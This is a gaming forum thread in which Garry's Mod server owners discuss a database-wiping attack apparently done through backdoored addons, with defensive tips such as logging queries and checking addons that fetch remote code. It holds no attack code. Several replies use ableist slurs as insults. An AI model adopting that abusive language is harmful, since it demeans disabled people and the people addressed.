Good morning Facepunch Community,
Earlier this morning one of our servers DarkRP was targeted by an unknown exploit or script backdoor that wiped every table in our db. Now according to the sources that I have spoken with in accordance with others who have been affected by this attack I highly recommend people back up there server's, this includes but not limited to the following.
- sv.db
- Mysql db's
- Data folder.
- Addons
Over the past following months servers have been attacked left and right by the following "cheat group" known as odium. The attacks have ranged from spamming servers to purchase said cheat, attacking steam groups in the masses with steam accounts to advertise said cheat. And now utilizing known and unknown backdoors - exploits to attack servers. This group has caused enough damage and I believe something needs to be done about it, along with many others who have unfortunately been victimized by this group.
Go to 11:15 to view the backdoor menu in action
[video]https://youtu.be/o514Mxpu0Kg?t=678[/video]
Anyone who has more information regarding this issue please post, it would be greatly appreciated.
This is a clear cut case of a server side code execution exploit gone off the charts, basically they either have a backdoor in your server or you have an addon/piece of code that contains exploits allowing them to run the code on your server. This isn't an exploit in Garry's Mod itself (that'd be very very unlikely at least), but rather with an addon or piece of scripting you've got installed.
Once they get to run 1 line of code on your server, they can do whatever the fuck they want to it from that point on.
Your server has got a lot of custom content and a wide range of scripts, correct? That's where you should begin looking at least.
@Author, the video I provided isn't from my server. That is a video that I was given as an example of what they are using.
I fully understand it is most likely an addon they are exploiting, I will find the issue in due time, this thread is designed to give a formal warning for others to use, so they understand the severity of the issue.
this is a backdoor
and the reason why you dont give random people access to rcon or run their lua
No. ( to op )
Seriously how are big server owners believing the most autistic shit
All you're doing is scaring other server owners that aren't that informed
There's a reason that custom coded servers like superior never get hit with an in-game exploit
Stop it
[QUOTE=Kevlon;52315517]No. ( to op )
Seriously how are big server owners believing the most autistic shit[/QUOTE]
because they have no brain and their server is developed by some retard on gmodstore
[QUOTE=Jelman;52315546]because they have no brain and their server is developed by some retard on gmodstore[/QUOTE]
Or better yet looked up some YouTube video recorded with Bandicam on how to setup a basic DarkRP server and how to install scripts, then went on a Gmod Store spending spree.
Please let us know if you find anything. This is a serious issue which needs to be sorted as soon as possible.
Writing this at 4:30am.
So every single server that ever bought a script is a retarded server lol? Last time I checked that is how All if not MOST of every community starts.
So your okay with exploits and shit like this to exist just because they are paid scripts on a script fodder website and god forbid someone uses them they are a shit server???? Please explain, we should definitely be showing awareness of this at least so it might be fixed and or the addon removed if found.
ʇsǝuıɟ sʇı ʇɐ ɯsıʇnɐ
[QUOTE=Stooge2;52315605]Writing this at 4:30am.
So every single server that ever bought a script is a retarded server lol? Last time I checked that is how All if not MOST of every community starts.
So your okay with exploits and shit like this to exist just because they are paid scripts on a script fodder website and god forbid someone uses them they are a shit server???? Please explain, we should definitely be showing awareness of this at least so it might be fixed and or the addon removed if found.
ʇsǝuıɟ sʇı ʇɐ ɯsıʇnɐ[/QUOTE]
No, it's not retarded. Buying scripts off Gmod Store is no problem. However, if you are going to be buying scripts from someone else, at the VERY LEAST check the code for any backdoors etc. You didn't code the script, therefore it could potentially have dodgy stuff in it. If you want to run a server without backdoors and problems etc, then learn how to do some programming and learn how to read code -- instead of whining that your server got backdoored.
[QUOTE=skytron;52315615]No, it's not retarded. Buying scripts off Gmod Store is no problem. However, if you are going to be buying scripts from someone else, at the VERY LEAST check the code for any backdoors etc. You didn't code the script, therefore it could potentially have dodgy stuff in it. If you want to run a server without backdoors and problems etc, then learn how to do some programming and learn how to read code -- instead of whining that your server got backdoored.[/QUOTE]
Most scripts from GmodStore don't have backdoors since the mods manually check each addon for backdoors. OP most likely got infected by a workshop addon.
[QUOTE=skytron;52315615]No, it's not retarded. Buying scripts off Gmod Store is no problem. However, if you are going to be buying scripts from someone else, at the VERY LEAST check the code for any backdoors etc. You didn't code the script, therefore it could potentially have dodgy stuff in it. If you want to run a server without backdoors and problems etc, then learn how to do some programming and learn how to read code -- instead of whining that your server got backdoored.[/QUOTE]
That is a fair point. But it doesn't mean the lower grade servers who are trying to make servers should be punished just because they don't know what to look for when scimming over an addon. Not everyone was born a genius.
I think its unfair to label them as retarded, more so in experienced.
[QUOTE=ThatLing;52315622]Most scripts from GmodStore don't have backdoors since the mods manually check each addon for backdoors. OP most likely got infected by a workshop addon.[/QUOTE]
Yeah they do manually check each addon. No doubt about that. But everyone is human and may miss something. Or perhaps the mods didn't check properly. Who knows, it's still better to check the code rather than just dumping it on and trusting. And fully agree with you about the workshop addon.
[editline]5th June 2017[/editline]
[QUOTE=Stooge2;52315624]That is a fair point. But it doesn't mean the lower grade servers who are trying to make servers should be punished just because they don't know what to look for when scimming over an addon. Not everyone was born a genius.
I think its unfair to label them as retarded, more so in experienced.[/QUOTE]
It's not a matter of fact of being a genious. Anyone can read, anyone can learn. It might take longer for others, doesn't change the fact that if the person has the capabaility of setting up a server, they have the capabaility of learning other things. Labeling them retarded isn't correct, more so inexperieneced as you say.
If anyone has any info please post it here. We will be outreaching to different server owners to let them know.
Listen, the point remains the same, someone is taking advantage of an exploit or backdoor, chances are, its a backdoor in a public addon. but the fact remains, noone knows what addon that may be, I will do everything in my power to find said addon and report it once I find it, It doesn't matter if you are the #1 darkrp or if you are a small server owner who just started, people need to be informed as to whats going on around the garry's mod community, if you dislike that, i'm sorry.
[QUOTE=Corvezeo;52315677]Listen, the point remains the same, someone is taking advantage of an exploit or backdoor, chances are, its a backdoor in a public addon. but the fact remains, noone knows what addon that may be, I will do everything in my power to find said addon and report it once I find it, It doesn't matter if you are the #1 darkrp or if you are a small server owner who just started, people need to be informed as to whats going on around the garry's mod community, if you dislike that, i'm sorry.[/QUOTE]
check all the third party workshop addons you're subscribed to in your collections and open them with gmad.
If any of those prop/model addons have random lua then its likely that.
[QUOTE=Jelman;52315692]check all the third party workshop addons you're subscribed to in your collections and open them with gmad.
If any of those prop/model addons have random lua then its likely that.[/QUOTE]
I sometimes wish that people on FP would stop automatically assuming that the person making X post is autistic. In the rare occurrence that the person knows at least most of what they're doing, you're just hindering progress.
[QUOTE=ertug20;52315707]I sometimes wish that people on FP would stop automatically assuming that the person making X post is autistic. In the rare occurrence that the person knows at least most of what they're doing, you're just hindering progress.[/QUOTE]
My French friends gmod server has been hacked! Everything is gone! We have been looking around and found that the org add-on has an Sql exploit! If anyone knows anyone that could contact gmodstore staff I'd appreciate it. His server has 50 player so thats what I'm making this thread btw.
SERVER OWNERS BEWARE ORGANIZATION ADD-ON HAS EXPLOIT
-> this is how dumb it'd sound if you knew what was causing it
(Based off real addon)
[QUOTE=Kevlon;52315760]My French friends gmod server has been hacked! Everything is gone! We have been looking around and found that the org add-on has an Sql exploit! If anyone knows anyone that could contact gmodstore staff I'd appreciate it. His server has 50 player so thats what I'm making this thread btw.
SERVER OWNERS BEWARE ORGANIZATION ADD-ON HAS EXPLOIT
-> this is how dumb it'd sound if you knew what was causing it
(Based off real addon)[/QUOTE]
I understand your point of view and I also agree that it's best if you either make everything yourself or contact developers to make everything custom (much better for security and generally cancer free) but that isn't always the case.
I am also guilty of assuming that some clients aren't the most knowledge people until they give me a reason to change that but surely if a top 10 GMod server (who should at least be assumed to know half of what they're doing) was having major issues along with many other reports, it should be a bit more concerning than just some random Frenchie server who uses leaked scripts.
[QUOTE=ertug20;52315807]I understand your point of view and I also agree that it's best if you either make everything yourself or contact developers to make everything custom (much better for security and generally cancer free) but that isn't always the case.
I am also guilty of assuming that some clients aren't the most knowledge people until they give me a reason to change that but surely if a top 10 GMod server (who should at least be assumed to know half of what they're doing) was having major issues along with many other reports, it should be a bit more concerning than just some random Frenchie server who uses leaked scripts.[/QUOTE]
Idk what u mean because garnet also had it until I told him to remove it.
[QUOTE=Kevlon;52315816]Idk what u mean because garnet also had it until I told him to remove it.[/QUOTE]
Some are better than others I suppose. Maybe I'm just giving them too much credit. If there is truly no difference between a community who pushes past 100 and one that uses leaked scripts and rarely gets past 15 players then there is a bigger issue at hand.
[QUOTE=Kevlon;52315816]Idk what u mean because garnet also had it until I told him to remove it.[/QUOTE]
Yeah, this was the addon which resulted in my server having its database wiped circa 2014: (which Kevlon mentioned to me)
[url]https://www.gmodstore.com/scripts/view/393/organisations-addon-for-darkrp[/url]
It looks like it has been updated since, but it was on scriptfodder for a period of well over 1 year with a backdoor. While Scriptfodder does have quality control, i'd safely say things go under the radar very frequently. IE: A radio SWEP was used to crash a community called ICE back in the days when I staffed on it, as well as a "party" addon by I believe rocketmania affected tens of new Gmod servers everyday.
Are you sure you didn't piss off someone that you doxed, threatened or refused to pay? Like this is uncommon for you?
@nootnoot Can we keep comments to relevant posting, please. this thread isn't for posting irrelevant useless ranting.
[QUOTE=ertug20;52315707]I sometimes wish that people on FP would stop automatically assuming that the person making X post is autistic. In the rare occurrence that the person knows at least most of what they're doing, you're just hindering progress.[/QUOTE]
If he's posting like this and has been backdoored then who the fuck knows
[URL="http://steamcommunity.com/groups/gmodnexus"]GNEX[/URL] will save you
[QUOTE=scottd564;52315916][URL="http://steamcommunity.com/groups/gmodnexus"]GNEX[/URL] will save you[/QUOTE]
This is literally the definition of oligarchy and collusion. As much as I'd love to optimisticly accept and fully see the "Big Server Men" conspiracy as pure irony, this just visualises how corruptively easy it is.
Lazy solution:
Log the queries that are being executed. At some point you're going to see a query that is obviously injected and then it won't be to hard to find the addon with the issue
Smart Solution:
Look for any addons contacting a weird URL that then uses something like RunString or something. Or look for addons that don't escape queries. Run a test server with a test DB and try to reproduce it.
Also make sure you're not using generic passwords for you DB's + your DB's are IP restricted (a while ago someone got my DB info off a site called haveIbeenpwned or something and just accessed it through there)
The GMod Shadow Cabal must be stopped at any cost, just look at this leaked pitchdeck:
[url]https://docs.google.com/presentation/d/1UcAyYHw5-CJ692bWg7JDO0l3KwZjtyLQco2L5ixvRZE/edit#slide=id.g22a79d92c3_0_0[/url]
This is truly the weirdest timeline.
BEST SOLUTION: Delete SRCDS
As stated probably caused by either leaked addons, or shitty workshop addons with badly hidden backdoors that allow for serverside code execution with a con command.
Sorry, you need to Log In to post a reply to this thread.
